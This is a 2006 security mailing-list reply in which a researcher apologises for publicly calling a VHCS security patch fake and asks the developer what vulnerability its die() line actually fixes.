Date: Sun Feb  5 23:16:46 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: Re: VHCS Security Patch - 2006-02-05 --> Fake!

Hi Alex,

My apologies if I've been a bit rough, but public security mailing-lists
are intended to deal with (un)security issues. I don't understand why
you didn't announce in mls the issue if a new vuln was being fixed. It
seemed some kind of joke or hack, since I missed the "die()" function
and I only saw security fixes being removed, so it was suspicious. I
decided to go public because people could be downloading wrong patch.

I didn't have time to analyze the effects of die() line there. I suppose
that's the real fix, isn't it? Could you elaborate on that? What's the
real vuln being fixed?

Sorry for the inconvenience. No offense was intended.

Cheers,
-Roman

--

Saludos,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]